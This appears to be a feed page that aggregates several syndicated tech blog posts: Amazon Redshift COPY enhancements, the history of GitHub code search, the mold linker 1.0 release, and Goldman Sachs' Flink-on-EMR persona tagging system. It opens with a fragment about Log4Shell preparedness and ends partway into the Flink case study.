Fear, Uncertainty, and Doubt (FUD) is in copious supply today and likely to persist into the coming weeks and months. While adopting an “assumed breach” mindset isn’t relevant for every celebrity vulnerability, the prevalence and transitive dependency of the Log4j library along with the sophisticated obfuscation exploit techniques we are witnessing in real time point out that the question we should be considering isn’t, “How long has it been around?” Rather, it is, “How long should we be mentally preparing ourselves (and setting expectations) to clean it up?”

Get more critical insights about defending against Log4Shell

Check out our resource center

Introducing new features for Amazon Redshift COPY: Part 1

Post Syndicated from Dipankar Kushari original https://aws.amazon.com/blogs/big-data/part-1-introducing-new-features-for-amazon-redshift-copy/

Amazon Redshift is a fast, scalable, secure, and fully managed cloud data warehouse that makes it simple and cost-effective to analyze all your data using standard SQL. Amazon Redshift offers up to three times better price performance than any other cloud data warehouse. Tens of thousands of customers use Amazon Redshift to process exabytes of data per day and power analytics workloads such as high-performance business intelligence (BI) reporting, dashboarding applications, data exploration, and real-time analytics.

Loading data is a key process for any analytical system, including Amazon Redshift. Loading very large datasets can take a long time and consume a lot of computing resources. How your data is loaded can also affect query performance. You can use many different methods to load data into Amazon Redshift. One of the fastest and most scalable methods is to use the COPY command. This post dives into some of the recent enhancements made to the COPY command and how to use them effectively.

Overview of the COPY command

A best practice for loading data into Amazon Redshift is to use the COPY command. The COPY command loads data in parallel from Amazon Simple Storage Service (Amazon S3), Amazon EMR, Amazon DynamoDB, or multiple data sources on any remote hosts accessible through a Secure Shell (SSH) connection.

The COPY command reads and loads data in parallel from a file or multiple files in an S3 bucket. You can take maximum advantage of parallel processing by splitting your data into multiple files, in cases where the files are compressed. The COPY command appends the new input data to any existing rows in the target table. The COPY command can load data from Amazon S3 for the file formats AVRO, CSV, JSON, and TXT, and for columnar format files such as ORC and Parquet.

Use COPY with FILLRECORD

In situations when the contiguous fields are missing at the end of some of the records for data files being loaded, COPY reports an error indicating that there is mismatch between the number of fields in the file being loaded and the number of columns in the target table. In some situations, columnar files (such as Parquet) that are produced by applications and ingested into Amazon Redshift via COPY may have additional fields added to the files (and new columns to the target Amazon Redshift table) over time. In such cases, these files may have values absent for certain newly added fields. To load these files, you previously had to either preprocess the files to fill up values in the missing fields before loading the files using the COPY command, or use Amazon Redshift Spectrum to read the files from Amazon S3 and then use INSERT INTO to load data into the Amazon Redshift table.

With the FILLRECORD parameter, you can now load data files with a varying number of fields successfully in the same COPY command, as long as the target table has all columns defined. The FILLRECORD parameter addresses ease of use because you can now directly use the COPY command to load columnar files with varying fields into Amazon Redshift instead of achieving the same result with multiple steps.

With the FILLRECORD parameter, missing columns are loaded as NULLs. For text and CSV formats, if the missing column is a VARCHAR column, zero-length strings are loaded instead of NULLs. To load NULLs to VARCHAR columns from text and CSV, specify the EMPTYASNULL keyword. NULL substitution only works if the column definition allows NULLs.

Use FILLRECORD while loading Parquet data from Amazon S3

In this section, we demonstrate the utility of FILLRECORD by using a Parquet file that has a smaller number of fields populated than the number of columns in the target Amazon Redshift table. First we try to load the file into the table without the FILLRECORD parameter in the COPY command, then we use the FILLRECORD parameter in the COPY command.

For the purpose of this demonstration, we have created the following components:

  • An Amazon Redshift cluster with a database, public schema, awsuser as admin user, and an AWS Identity and Access Management (IAM) role, used to perform the COPY command to load the file from Amazon S3, attached to the Amazon Redshift cluster. For details on authorizing Amazon Redshift to access other AWS services, refer to Authorizing Amazon Redshift to access other AWS services on your behalf.
  • An Amazon Redshift table named call_center_parquet.
  • A Parquet file already uploaded to an S3 bucket from where the file is copied into the Amazon Redshift cluster.

The following code is the definition of the call_center_parquet table:

DROP TABLE IF EXISTS public.call_center_parquet;
CREATE TABLE IF NOT EXISTS public.call_center_parquet
(
	cc_call_center_sk INTEGER NOT NULL ENCODE az64
	,cc_call_center_id varchar(100) NOT NULL  ENCODE lzo
	,cc_rec_start_date VARCHAR(50)   ENCODE lzo
	,cc_rec_end_date VARCHAR(50)   ENCODE lzo
	,cc_closed_date_sk varchar (100)   ENCODE lzo
	,cc_open_date_sk INTEGER   ENCODE az64
	,cc_name VARCHAR(50)   ENCODE lzo
	,cc_class VARCHAR(50)   ENCODE lzo
	,cc_employees INTEGER   ENCODE az64
	,cc_sq_ft INTEGER   ENCODE az64
	,cc_hours VARCHAR(20)   ENCODE lzo
	,cc_manager VARCHAR(40)   ENCODE lzo
	,cc_mkt_id INTEGER   ENCODE az64
	,cc_mkt_class VARCHAR(50)   ENCODE lzo
	,cc_mkt_desc VARCHAR(100)   ENCODE lzo
	,cc_market_manager VARCHAR(40)   ENCODE lzo
	,cc_division INTEGER   ENCODE az64
	,cc_division_name VARCHAR(50)   ENCODE lzo
	,cc_company INTEGER   ENCODE az64
	,cc_company_name VARCHAR(50)   ENCODE lzo
	,cc_street_number INTEGER   ENCODE az64
	,cc_street_name VARCHAR(60)   ENCODE lzo
	,cc_street_type VARCHAR(15)   ENCODE lzo
	,cc_suite_number VARCHAR(10)   ENCODE lzo
	,cc_city VARCHAR(60)   ENCODE lzo
	,cc_county VARCHAR(30)   ENCODE lzo
	,cc_state CHAR(2)   ENCODE lzo
	,cc_zip INTEGER   ENCODE az64
	,cc_country VARCHAR(20)   ENCODE lzo
	,cc_gmt_offset NUMERIC(5,2)   ENCODE az64
	,cc_tax_percentage NUMERIC(5,2)   ENCODE az64
)
DISTSTYLE ALL
;
ALTER TABLE public.call_center_parquet OWNER TO awsuser;

The table has 31 columns.

The Parquet file doesn’t contain any value for the cc_gmt_offset and cc_tax_percentage fields. It has 29 columns. The following screenshot shows the schema definition for the Parquet file located in Amazon S3, which we load into Amazon Redshift.

We ran the COPY command two different ways: with or without the FILLRECORD parameter.

We first tried to load the Parquet file into the call_center_parquet table without the FILLRECORD parameter:

COPY call_center_parquet
FROM 's3://*****************/parquet/part-00000-d9a3ab22-9d7d-439a-b607-2ddc2d39c5b0-c000.snappy.parquet'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole'
FORMAT PARQUET;

It generated an error while performing the copy.

Next, we tried to load the Parquet file into the call_center_parquet table and used the FILLRECORD parameter:

COPY call_center_parquet
FROM 's3://*****************/parquet/part-00000-d9a3ab22-9d7d-439a-b607-2ddc2d39c5b0-c000.snappy.parquet'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole'
FORMAT PARQUET FILLRECORD;

The Parquet data was loaded successfully in the call_center_parquet table, and NULL was entered into the cc_gmt_offset and cc_tax_percentage columns.

Split large text files while copying

The second new feature we discuss in this post is automatically splitting large files to take advantage of the massive parallelism of the Amazon Redshift cluster. A best practice when using the COPY command in Amazon Redshift is to load data using a single COPY command from multiple data files. This loads data in parallel by dividing the workload among the nodes and slices in the Amazon Redshift cluster. When all the data from a single file or small number of large files is loaded, Amazon Redshift is forced to perform a much slower serialized load, because the Amazon Redshift COPY command can’t utilize the parallelism of the Amazon Redshift cluster. You have to write additional preprocessing steps to split the large files into smaller files so that the COPY command loads data in parallel into the Amazon Redshift cluster.

The COPY command now supports automatically splitting a single file into multiple smaller scan ranges. This feature is currently supported only for large uncompressed delimited text files. More file formats and options, such as COPY with CSV keyword, will be added in the near future.

This helps improve performance for COPY queries when loading a small number of large uncompressed delimited text files into your Amazon Redshift cluster. Scan ranges are implemented by splitting the files into 64 MB chunks, which get assigned to each Amazon Redshift slice. This change addresses ease of use because you don’t need to split large uncompressed text files as an additional preprocessing step.

With Amazon Redshift’s ability to split large uncompressed text files, you can see performance improvements for the COPY command with a single large file or a few files with significantly varying relative sizes (for example, one file 5 GB in size and 20 files of a few KBs). Performance improvements for the COPY command are more significant as the file size increases even with keeping the same Amazon Redshift cluster configuration. Based on tests done, we observed a more than 1,500% performance improvement for the COPY command for loading a 6 GB uncompressed text file when the auto splitting feature became available.

There are no changes in the COPY query or keywords to enable this change, and splitting of files is automatically applied for the eligible COPY commands. Splitting isn’t applicable for the COPY query with the keywords CSV, REMOVEQUOTES, ESCAPE, and FIXEDWIDTH.

For the test, we used a single 6 GB uncompressed text file and the following COPY command:

COPY store_sales
FROM 's3://*****************/text/store_sales.txt'
iam_role 'arn:aws:iam::**********:role/RedshiftAttachedRole';

The Amazon Redshift cluster without the auto split option took 102 seconds to copy the file from Amazon S3 to the Amazon Redshift store_sales table. When the auto split option was enabled in the Amazon Redshift cluster (without any other configuration changes), the same 6 GB uncompressed text file took just 6.19 seconds to copy the file from Amazon S3 to the store_sales table.

Summary

In this post, we showed two enhancements to the Amazon Redshift COPY command. First, we showed how you can add the FILLRECORD parameter in the COPY command in order to successfully load data files even when the contiguous fields are missing at the end of some of the records, as long as the target table has all the columns. Secondly, we described how Amazon Redshift auto splits large uncompressed text files into 64 MB chunks before copying the files into the Amazon Redshift cluster to enhance COPY performance. This automatic split of large files allows you to use the COPY command on large uncompressed text files—Amazon Redshift auto splits the file without needing you to add a preprocessing step to the split the large files yourself. Try these features to make your data loading to Amazon Redshift much simpler by removing custom preprocessing steps.

In Part 2 of this series, we will discuss additional new features of Amazon Redshift COPY command and demonstrate how you can take benefits of those to optimize your data loading process.


About the Authors

Dipankar Kushari is a Senior Analytics Solutions Architect with AWS.

Cody Cunningham is a Software Development Engineer with AWS, working on data ingestion for Amazon Redshift.

Joe Yong is a Senior Technical Product Manager on the Amazon Redshift team and a relentless pursuer of making complex database technologies easy and intuitive for the masses. He has worked on database and data management systems for SMP, MPP, and distributed systems. Joe has shipped dozens of features for on-premises and cloud-native databases that serve IoT devices through petabyte-sized cloud data warehouses. Off keyboard, Joe tries to onsight 5.11s, hunt for good eats, and seek a cure for his Australian Labradoodle’s obsession with squeaky tennis balls.

Anshul Purohit is a Software Development Engineer with AWS, working on data ingestion and query processing for Amazon Redshift.

A brief history of code search at GitHub

Post Syndicated from Pavel Avgustinov original https://github.blog/2021-12-15-a-brief-history-of-code-search-at-github/

We recently launched a technology preview for the next-generation code search we have been building. If you haven’t signed up already, go ahead and do it now!

We want to share more about our work on code exploration, navigation, search, and developer productivity. Recently, we substantially improved the precision of our code navigation for Python, and open-sourced the tools we developed for this. The stack graph formalism we developed will form the basis for precise code navigation support for more languages, and will even allow us to empower language communities to build and improve support for their own languages, similarly to how we accept contributions to github/linguist to expand GitHub’s syntax highlighting capabilities.

This blog post is part of the same series, and tells the story of why we built a new search engine optimized for code over the past 18 months. What challenges did we set ourselves? What is the historical context, and why could we not continue to build on off-the-shelf solutions? Read on to find out.

What’s our goal?

We set out to provide an experience that could become an integral part of every developer’s workflow. This has imposed hard constraints on the features, performance, and scalability of the system we’re building. In particular:

  • Searching code is different: many standard techniques (like stemming and tokenization) are at odds with the kind of searches we want to support for source code. Identifier names and punctuation matter. We need to be able to match substrings, not just whole “words”. Specialized queries can require wildcards or even regular expressions. In addition, scoring heuristics tuned for natural language and web pages do not work well for source code.
  • The scale of the corpus size: GitHub hosts over 200 million repositories, with over 61 million repositories created in the past year. We aim to support global queries across all of them, now and in the foreseeable future.
  • The rate of change: over 170 million pull requests were merged in the past year, and this does not even account for code pushed directly to a branch. We would like our index to reflect the updated state of a repository within a few minutes of a push event.
  • Search performance and latency: developers want their tools to be blazingly fast, and if we want to become part of every developer’s workflow we have to satisfy that expectation. Despite the scale of our index, we want p95 query times to be (well) under a second. Most user queries, or queries scoped to a set of repositories or organizations, should be much faster than that.

Over the years, GitHub has leveraged several off-the-shelf solutions, but as the requirements evolved over time, and the scale problem became ever more daunting, we became convinced that we had to build a bespoke search engine for code to achieve our objectives.

The early years

In the beginning, GitHub announced support for code search, as you might expect from a website with the tagline of “Social Code Hosting.” And all was well.

Screenshot of GitHub public code search

Except… you might note the disclaimer “GitHub Public Code Search.” This first iteration of global search worked by indexing all public documents into a Solr instance, which determined the results you got. While this nicely side-steps visibility and authorization concerns (everything is public!), not allowing private repositories to be searched would be a major functionality gap. The solution?

Screenshot of Solr-backed "Search source code"

Image credit: Patrick Linskey on Stack Overflow

The repository page showed a “Search source code” field. For public repos, this was still backed by the Solr index, scoped to the active repository. For private repos, it shelled out to git grep.

Quite soon after shipping this, the then-in-beta Google Code Search began crawling public repositories on GitHub too, thus giving developers an alternative way of searching them. (Ultimately, Google Code Search was discontinued a few years later, though Russ Cox’s excellent blog post on how it worked remains a great source of inspiration for successor projects.)

Unfortunately, the different search experience for public and private repositories proved pretty confusing in practice. In addition, while git grep is a widely understood gold standard for how to search the contents of a Git repository, it operates without a dedicated index and hence works by scanning each document—taking time proportional to the size of the repository. This could lead to resource exhaustion on the Git hosts, and to an unresponsive web page, making it necessary to introduce timeouts. Large private repositories remained unsearchable.

Scaling with Elasticsearch

By 2010, the search landscape was seeing considerable upheaval. Solr joined Lucene as a subproject, and Elasticsearch sprang up as a great way of building and scaling on top of Lucene. While Elasticsearch wouldn’t hit a 1.0.0 release until February 2014, GitHub started experimenting with adopting it in 2011. An initial tentative experiment that indexed gists into Elasticsearch to make them searchable showed great promise, and before long it was clear that this was the future for all search on GitHub, including code search.

Indeed in early 2013, just as Google Code Search was winding down, GitHub launched a whole new code search backed by an Elasticsearch cluster, consolidating the search experience for public and private repositories and updating the design. The search index covered almost five million repositories at launch.

Screenshot of Elasticsearch-backed code search UI

The scale of operations was definitely challenging, and within days or weeks of the launch GitHub experienced its first code search outages. The postmortem blog post is quite interesting on several levels, and it gives a glimpse of the cluster size (26 storage nodes with 2 TB of SSD storage each), utilization (67% of storage used), environment (Elasticsearch 0.19.9 and 0.20.2, Java 6 and 7), and indexing complexity (several months to backfill all repository data). Several bugs in Elasticsearch were identified and fixed, allowing GitHub to resume operations on the code search service.

In November 2013, Elasticsearch published a case study on GitHub’s code search cluster, again including some interesting data on scale. By that point, GitHub was indexing eight million repositories and responding to 5 search requests per second on average.

In general, our experience working with Elasticsearch has been truly excellent. It powers all kinds of search on GitHub.com, doing an excellent job throughout. The code search index is by far the largest cluster we operate , and it has grown in scale by another 20-40x since the case study (to 162 nodes, comprising 5184 vCPUs, 40TB of RAM, and 1.25PB of backing storage, supporting a query load of 200 requests per second on average and indexing over 53 billion source files). It is a testament to the capabilities of Elasticsearch that we have got this far with essentially an off-the-shelf search engine.

My code is not a novel

Elasticsearch excelled at most search workloads, but almost immediately some wrinkles and friction started cropping up in connection with code search. Perhaps the most widely observed is this comment from the code search documentation:

You can’t use the following wildcard characters as part of your search query: . , : ; / \ ` ' " = * ! ? # $ & + ^ | ~ < > ( ) { } [ ] @. The search will simply ignore these symbols.

Source code is not like normal text, and those “punctuation” characters actually matter. So why are they ignored by GitHub’s production code search? It comes down to how our ingest pipeline for Elasticsearch is configured.

Click here to read the full details

 
When documents are added to an Elasticsearch index, they are passed through a process called text analysis, which converts unstructured text into a structured format optimized for search. Commonly, text analysis is configured to normalize away details that don’t matter to search (for example, case folding the document to provide case-insensitive matches, or compressing runs of whitespace into one, or stemming words so that searching for “ingestion” also finds “ingest pipeline”). Ultimately, it performs tokenization, splitting the normalized input document into a list of tokens whose occurrence should be indexed.

Many features and defaults available to text analysis are geared towards indexing natural-language text. To create an index for source code, we defined a custom text analyzer, applying a carefully selected set of normalizations (for example, case-folding and compressing whitespace make sense, but stemming does not). Then, we configured a custom pattern tokenizer, splitting the document using the following regular expression: %q_[.,:;/\\\\`'"=*!@?#$&+^|~<>(){}\[\]\s]_. If you look closely, you’ll recognise the list of characters that are ignored in your query string!

The tokens resulting from this split then undergo a final round of splitting, extracting word parts delimited in CamelCase and snake_case as additional tokens to make them searchable. To illustrate, suppose we are ingesting a document containing this declaration: pub fn pthread_getname_np(tid: ::pthread_t, name: *mut ::c_char, len: ::size_t) -> ::c_int;. Our text analysis phase would pass the following list of tokens to Elasticsearch to index: pub fn pthread_getname_np pthread getname np tid pthread_t pthread t name mut c_char c char len size_t size t c_int c int. The special characters simply do not figure in the index; instead, the focus is on words recovered from identifiers and keywords.

Designing a text analyzer is tricky, and involves hard trade-offs between index size and performance on the one hand, and the types of queries that can be answered on the other. The approach described above was the result of careful experimentation with different strategies, and represented a good compromise that has allowed us to launch and evolve code search for almost a decade.

 
Another consideration for source code is substring matching. Suppose that I want to find out how to get the name of a thread in Rust, and I vaguely remember the function is called something like thread_getname. Searching for thread_getname org:rust-lang will give no results on our Elasticsearch index; meanwhile, if I cloned rust-lang/libc locally and used git grep, I would instantly find pthread_getname_np. More generally, power users reach for regular expression searches almost immediately.

The earliest internal discussions of this that I can find date to October 2012, more than a year before the public release of Elasticsearch-based code search. We considered various ways of refining the Elasticsearch tokenization (in fact, we turn pthread_getname_np into the tokens pthread, getname, np, and pthread_getname_np—if I had searched for pthread getname rather than thread_getname, I would have found the definition of pthread_getname_np). We also evaluated trigram tokenization as described by Russ Cox. Our conclusion was summarized by a GitHub employee as follows:

The trigram tokenization strategy is very powerful. It will yield wonderful search results at the cost of search time and index size. This is the approach I would like to take, but there is work to be done to ensure we can scale the ElasticSearch cluster to meet the needs of this strategy.

Given the initial scale of the Elasticsearch cluster mentioned above, it wasn’t viable to substantially increase storage and CPU requirements at the time, and so we launched with a best-effort tokenization tuned for code identifiers.

Over the years, we kept coming back to this discussion. One promising idea for supporting special characters, inspired by some conversations with Elasticsearch experts at Elasticon 2016, was to use a Lucene tokenizer pattern that split code on runs of whitespace, but also on transitions from word characters to non-word characters (crucially, using lookahead/lookbehind assertions, without consuming any characters in this case; this would create a token for each special character). This would allow a search for ”answer >= 42” to find the source text answer >= 42 (disregarding whitespace, but including the comparison). Experiments showed this approach took 43-100% longer to index code, and produced an index that was 18-28% larger than the baseline. Query performance also suffered: at best, it was as fast as the baseline, but some queries (especially those that used special characters, or otherwise split into many tokens) were up to 4x slower. In the end, a typical query slowdown of 2.1x seemed like too high a price to pay.

By 2019, we had made significant investments in scaling our Elasticsearch cluster simply to keep up with the organic growth of the underlying code corpus. This gave us some performance headroom, and at GitHub Universe 2019 we felt confident enough to announce an “exact-match search” beta, which essentially followed the ideas above and was available for allow-listed repositories and organizations. We projected around a 1.3x increase in Elasticsearch resource usage for this index. The experience from the limited beta was very illuminating, but it proved too difficult to balance the additional resource requirements with ongoing growth of the index. In addition, even after the tokenization improvements, there were still numerous unsupported use cases (like substring searches and regular expressions) that we saw no path towards. Ultimately, exact-match search was sunset in just over half a year.

Project Blackbird

Actually, a major factor in pausing investment in exact-match search was a very promising research prototype search engine, internally code-named Blackbird. The project had been kicked off in early 2020, with the goal of determining which technologies would enable us to offer code search features at GitHub scale, and it showed a path forward that has led to the technology preview we launched last week.

Let’s recall our ambitious objectives: comprehensively index all source code on GitHub, support incremental indexing and document deletion, and provide lightning-fast exact-match and regex searches (specifically, a p95 of under a second for global queries, with correspondingly lower targets for org-scoped and repo-scoped searches). Do all this without using substantially more resources than the existing Elasticsearch cluster. Integrate other sources of rich code intelligence information available on GitHub. Easy, right?

We found that no off-the-shelf code indexing solution could satisfy those requirements. Russ Cox’s trigram index for code search only stores document IDs rather than positions in the posting lists; while that makes it very space-efficient, performance degrades rapidly with a large corpus size. Several successor projects augment the posting lists with position information or other data; this comes at a large storage and RAM cost (Zoekt reports a typical index size of 3.5x corpus size) that makes it too expensive at our scale. The sharding strategy is also crucial, as it determines how evenly distributed the load is. And any significant per-repo overhead becomes prohibitive when considering scaling the index to all repositories on GitHub.

In the end, Blackbird convinced us to go all-in on building a custom search engine for code. Written in Rust, it creates and incrementally maintains a code search index sharded by Git blob object ID; this gives us substantial storage savings via deduplication and guarantees a uniform load distribution across shards (something that classic approaches sharding by repo or org, like our existing Elasticsearch cluster, lack). It supports regular expression searches over document content and can capture additional metadata—for example, it also maintains an index of symbol definitions. It meets our performance goals: while it’s always possible to come up with a pathological search that misses the index, it’s exceptionally fast for “real” searches. The index is also extremely compact, weighing in at about ⅔ of the (deduplicated) corpus size.

One crucial realization was that if we want to index all code on GitHub into a single index, result scoring and ranking are absolutely critical; you really need to find useful documents first. Blackbird implements a number of heuristics, some code-specific (ranking up definitions and penalizing test code), and others general-purpose (ranking up complete matches and penalizing partial matches, so that when searching for thread an identifier called thread will rank above thread_id, which will rank above pthread_getname_np). Of course, the repository in which a match occurs also influences ranking. We want to show results from popular open-source repositories before a random match in a long-forgotten repository created as a test.

All of this is very much a work in progress. We are continuously tuning our scoring and ranking heuristics, optimizing the index and query process, and iterating on the query language. We have a long list of features to add. But we want to get what we have today into the hands of users, so that your feedback can shape our priorities.

We have more to share about the work we’re doing to enhance developer productivity at GitHub, so stay tuned.

The shoulders of giants

Modern software development is about collaboration and about leveraging the power of open source. Our new code search is no different. We wouldn’t have gotten anywhere close to its current state without the excellent work of tens of thousands of open source contributors and maintainers who built the tools we use, the libraries we depend on, and whose insightful ideas we could adopt and develop. A small selection of shout-outs and thank-yous:

  • The communities of the languages and frameworks we build on: Rust, Go, and React. Thanks for enabling us to move fast.
  • @BurntSushi: we are inspired by Andrew’s prolific output, and his work on the regex and aho-corasick crates in particular has been invaluable to us.
  • @lemire’s work on fast bit packing is integral to our design, and we drew a lot of inspiration from his optimization work more broadly (especially regarding the use of SIMD). Check out his blog for more.
  • Enry and Tree-sitter, which power Blackbird’s language detection and symbol extraction, respectively.

Mold (linker) 1.0 released

Post Syndicated from original https://lwn.net/Articles/878759/rss

Version
1.0
of the mold linker has been released.

mold 1.0 is the first stable and production-ready release of the
high-speed linker. On Linux-based systems, it should “just work” as
a faster drop-in replacement for the default GNU linker for most
user-land programs. If you are building a large executable which
takes a long time to link, mold is worth a try to see if it can
shorten your build time.

How Goldman Sachs built persona tagging using Apache Flink on Amazon EMR

Post Syndicated from Balasubramanian Sakthivel original https://aws.amazon.com/blogs/big-data/how-goldman-sachs-built-persona-tagging-using-apache-flink-on-amazon-emr/

The Global Investment Research (GIR) division at Goldman Sachs is responsible for providing research and insights to the firm’s clients in the equity, fixed income, currency, and commodities markets. One of the long-standing goals of the GIR team is to deliver a personalized experience and relevant research content to their research users. Previously, in order to customize the user experience for their various types of clients, GIR offered a few distinct editions of their research site that were provided to users based on broad criteria. However, GIR did not have any way to create a personally curated content flow at the individual user level. To provide this functionality, GIR wanted to implement a system to actively filter the content that is recommended to their users on a per-user basis, keyed on characteristics such as the user’s job title or working region. Having this kind of system in place would both improve the user experience and simplify the workflows of GIR’s research users, by reducing the amount of time and effort required to find the research content that they need.

The first step towards achieving this is to directly classify GIR’s research users based on their profiles and readership. To that end, GIR created a system to tag users with personas. Each persona represents a type or classification that individual users can be tagged with, based on certain criteria. For example, GIR has a series of personas for classifying a user’s job title, and a user tagged with the “Chief Investment Officer” persona will have different research content highlighted and have a different site experience compared to one that is tagged with the “Corporate Treasurer” persona. This persona-tagging system can both efficiently carry out the data operations required for tagging users, as well as have new personas created as needed to fit use cases as they emerge.

In this post, we look at how GIR implemented this system using Amazon EMR.

Challenge

Given the number of contacts (i.e., millions) and the growing number of publications maintained in GIR’s research data store, creating a system for classifying users and recommending content is a scalability challenge. A newly created persona could potentially apply to almost every contact, in which case a tagging operation would need to be performed on several million data entries. In general, the number of contacts, the complexity of the data stored per contact, and the amount of criteria for personalization can only increase. To future-proof their workflow, GIR needed to ensure that their solution could handle the processing of large amounts of data as an expected and frequent case.

GIR’s business goal is to support two kinds of workflows for classification criteria: ad hoc and ongoing. An ad hoc criteria causes users that currently fit the defining criteria condition to immediately get tagged with the required persona, and is meant to facilitate the one-time tagging of specific contacts. On the other hand, an ongoing criteria is a continuous process that automatically tags users with a persona if a change to their attributes causes them to fit the criteria condition. The following diagram illustrates the desired personalization flow:

In the rest of this post, we focus on the design and implementation of GIR’s ad hoc workflow.

Apache Flink on Amazon EMR

To meet GIR’s scalability demands, they determined that Amazon EMR was the best fit for their use case, being a managed big data platform meant for processing large amounts of data using open source technologies such as Apache Flink. Although GIR evaluated a few other options that addressed their scalability concerns (such as AWS Glue), GIR chose Amazon EMR for its ease of integration into their existing systems and possibility to be adapted for both batch and streaming workflows.

Apache Flink is an open source big data distributed stream and batch processing engine that efficiently processes data from continuous events. Flink offers exactly-once guarantees, high throughput and low latency, and is suited for handling massive data streams. Also, Flink provides many easy-to-use APIs and mitigates the need for the programmer to worry about failures. However, building and maintaining a pipeline based on Flink comes with operational overhead and requires considerable expertise, in addition to provisioning physical resources.

Amazon EMR empowers users to create, operate, and scale big data environments such as Apache Flink quickly and cost-effectively. We can optimize costs by using Amazon EMR managed scaling to automatically increase or decrease the cluster nodes based on workload. In GIR’s use case, their users need to be able to trigger persona-tagging operations at any time, and require a predictable completion time for their jobs. For this, GIR decided to launch a long-running cluster, which allows multiple Flink jobs to be submitted simultaneously to the same cluster.

Ad hoc persona-tagging infrastructure and workflow

The following diagram illustrates the architecture of GIR’s ad hoc persona-tagging workflow on the AWS Cloud.

This is a broad overview, and the specifics of networking and security between components are out of scope for this post.

At a high level, we can discuss GIR’s workflow in four parts:

  1. Upload the Flink job artifacts to the EMR cluster.
  2. Trigger the Flink job.
  3. Within the Flink job, transform and then store user data.
  4. Continuous monitoring.

You can interact with Flink on Amazon EMR via the Amazon EMR console or the AWS Command Line Interface (AWS CLI). After launching the cluster, GIR used the Flink API to interact with and submit work to the Flink application. The Flink API provided a bit more functionality and was much easier to invoke from an AWS Lambda application.

The end goal of the setup is to have a pipeline where GIR’s internal users can freely make requests to update contact data (which in this use case is tagging or untagging contacts with various personas), and then have the updated contact data uploaded back to the GIR contact store.

Upload the Flink job artifacts to Amazon EMR

GIR has a GitLab project on-premises for managing the contents of their Flink job. To trigger the first part of their workflow and deploy a new version of the Flink job onto the cluster, a GitLab pipeline is run that first creates a .zip file containing the Flink job JAR file, properties, and config files.

The preceding diagram depicts the sequence of events that occurs in the job upload:

  1. The GitLab pipeline is manually triggered when a new Flink job should be uploaded. This transfers the .zip file containing the Flink job to an Amazon Simple Storage Service (Amazon S3) bucket on the GIR AWS account, labeled as “S3 Deployment artifacts”.
  2. A Lambda function (“Upload Lambda”) is triggered in response to the create event from Amazon S3.
  3. The function first uploads the Flink job JAR to the Amazon EMR Flink cluster, and retrieves the application ID for the Flink session.
  4. Finally, the function uploads the application properties file to a specific S3 bucket (“S3 Flink Job Properties”).

Trigger the Flink job

The second part of the workflow handles the submission of the actual Flink job to the cluster when job requests are generated. GIR has a user-facing web app called Personalization Workbench that provides the UI for carrying out persona-tagging operations. Admins and internal Goldman Sachs users can construct requests to tag or untag contacts with personas via this web app. When a request is submitted, a data file is generated that contains the details of the request.

The steps of this workflow are as follows:

  1. Personalization Workstation submits the details of the job request to the Flink Data S3 bucket, labeled as “S3 Flink data”.
  2. A Lambda function (“Run Lambda”) is triggered in response to the create event from Amazon S3.
  3. The function first reads the job properties file uploaded in the previous step to get the Flink job ID.
  4. Finally, the function makes an API call to run the required Flink job.

Process data

Contact data is processed according to the persona-tagging requests, and the transformed data is then uploaded back to the GIR contact store.

The steps of this workflow are as follows:

  1. The Flink job first reads the application properties file that was uploaded as part of the first step.
  2. Next, it reads the data file from the second workflow that contains the contact and persona data to be updated. The job then carries out the processing for the tagging or untagging operation.
  3. The results are uploaded back to the GIR contact store.
  4. Finally, both successful and failed requests are written back to Amazon S3.

Continuous monitoring

The final part of the overall workflow involves continuous monitoring of the EMR cluster in order to ensure that GIR’s tagging workflow is stable and that the cluster is in a healthy state. To ensure that the highest level of security is maintained with their client data, GIR wanted to avoid unconstrained SSH access to their AWS resources. Being constrained from accessing the EMR cluster’s primary node directly via SSH meant that GIR initially had no visibility into the EMR primary node logs or the Flink web interface.

By default, Amazon EMR archives the log files stored on the primary node to Amazon S3 at 5-minute intervals. Because this pipeline serves as a central platform for processing many ad hoc persona-tagging requests at a time, it was crucial for GIR to build a proper continuous monitoring system that would allow them to promptly diagnose any issues with the cluster.

To accomplish this, GIR implemented two monitoring solutions:

  • GIR installed an Amazon CloudWatch agent onto every node of their EMR cluster via bootstrap actions. The CloudWatch agent collects and publishes Flink metrics to CloudWatch under a custom metric namespace, where they can be viewed on the CloudWatch console. GIR configured the CloudWatch agent configuration file to capture relevant metrics, such as CPU utilization and total running EMR instances. The result is an EMR cluster where metrics are emitted to CloudWatch at a much faster rate than waiting for periodic S3 log flushes.
  • They also enabled the Flink UI in read-only mode by fronting the cluster’s primary node with a network load balancer and establishing connectivity from the Goldman Sachs on-premises network. This change allowed GIR to gain direct visibility into the state of their running EMR cluster and in-progress jobs.

Observations, challenges faced, and lessons learned

The personalization effort marked the first-time adoption of Amazon EMR within GIR. To date, hundreds of personalization criteria have been created in GIR’s production environment. In terms of web visits and clickthrough rate, site engagement with GIR personalized content has gradually increased since the implementation of the persona-tagging system.

GIR faced a few noteworthy challenges during development, as follows:

Restrictive security group rules

By default, Amazon EMR creates its security groups with rules that are less restrictive, because Amazon EMR can’t anticipate the specific custom settings for ingress and egress rules required by individual use cases. However, proper management of the security group rules is critical to protect the pipeline and data on the cluster. GIR used custom-managed security groups for their EMR cluster nodes and included only the needed security group rules for connectivity, in order to fulfill this stricter security posture.

Custom AMI

There were challenges in ensuring that the required packages were available when using custom Amazon Linux AMIs for Amazon EMR. As part of Goldman Sachs development SDLC controls, any Amazon Elastic Compute Cloud (Amazon EC2) instances on Goldman Sachs-owned AWS accounts are required to use internal Goldman Sachs-created AMIs. When GIR began development, the only compliant AMI that was available under this control was a minimal AMI based on the publicly available Amazon Linux 2 minimal AMI (amzn2-ami-minimal*-x86_64-ebs). However, Amazon EMR recommends using the full default Amazon 2 Linux AMI because it has all the necessary packages pre-installed. This resulted in various start up errors with no clear indication of the missing libraries.

GIR worked with AWS support to identify and resolve the issue by comparing the minimal and full AMIs, and installing the 177 missing packages individually (see the appendix for the full list of packages). In addition, various AMI-related files had been set to read-only permissions by the Goldman Sachs internal AMI creation process. Restoring these permissions to full read/write access allowed GIR to successfully start up their cluster.

Stalled Flink jobs

